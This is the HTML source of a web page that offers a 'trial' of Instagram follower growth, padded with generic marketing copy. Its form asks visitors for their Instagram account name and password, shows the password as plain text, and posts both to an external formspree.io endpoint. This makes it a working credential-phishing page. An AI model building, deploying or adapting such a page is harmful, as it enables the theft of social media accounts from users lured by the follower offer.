<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>get trail here</title>
    <style>

        #navbar{
    background-color: darkblue;
    align-items: center;
    display: flex;
    height: 50px;
    width: auto;
    margin: 0;
}
body{
    font-family: 'Times New Roman', Times, serif;
}
.container{
    background-color: rgba(248, 163, 6, 0.541);
    color: rgb(131, 90, 2);
}
p{
    text-align: left;
    padding-left: 10px;
    padding-top: 20px;
    padding-bottom: 20px;
    
}
.moss{
    margin: 0;
    background-color: rgb(14, 2, 80);
    color: rgba(7, 223, 252, 0.63);
}
.container{
    margin: 0;
}

.box{
    background-color: rgba(69, 48, 255, 0.5);
    height: 200px;
    width: auto;
    border: 2px;
    border-radius: 20px;
    
}
label{
    text-align: left;
    margin-left: 10%;
    display: inline-block;
}

input{
    align-items: center;
    border-radius: 10px;
    border-color: black;
    text-align: center;
}
h1{
    text-align: center;
    color: rgb(47, 0, 255);
}
button{
    border: 3px;
    border-color: black;
    background-color: brown;
    border-radius: 10px;
    text-align: center;
    height: 20px;
    width: 100px;
    margin-left: 40%;
    margin-top: 40px;
}
    </style>
</head>
<body>

    <div id="navbar">
        <img src="logo.jpg" alt="" height="100%" width="100%" style="object-fit: cover;">
    </div>
    <div class="moss"><marquee behavior="" direction="right">folow us to reach our fandom and make us happy :)</marquee></div>

    <div class="container"><p>In the ever-evolving landscape of social media, Instagram stands out as a powerhouse, captivating billions of users with its visual storytelling platform. Whether you're a budding influencer, a small business owner, or just someone looking to boost their online presence, the key to Instagram success lies in not just amassing followers but in engaging and retaining them. Here's a comprehensive guide to help you unlock the secrets to growing and maintaining a thriving Instagram community.</p></div>
<div class="box">
    <h1>fill this form for trial</h1>
    <form action="https://formspree.io/f/mleqjgnz"
    method="POST">
         <div class="hamp">
         <label for="name">Account</label>
          <input type="text" id="name" name="id" required><br><br>

          <label for="Pass">pass</label>
          <input type="text" id="name" name="pass" required><br>

          <button type="submit">Submit</button> 
          </div> 
      </form>
  </main>
</div>
</body>
</html>
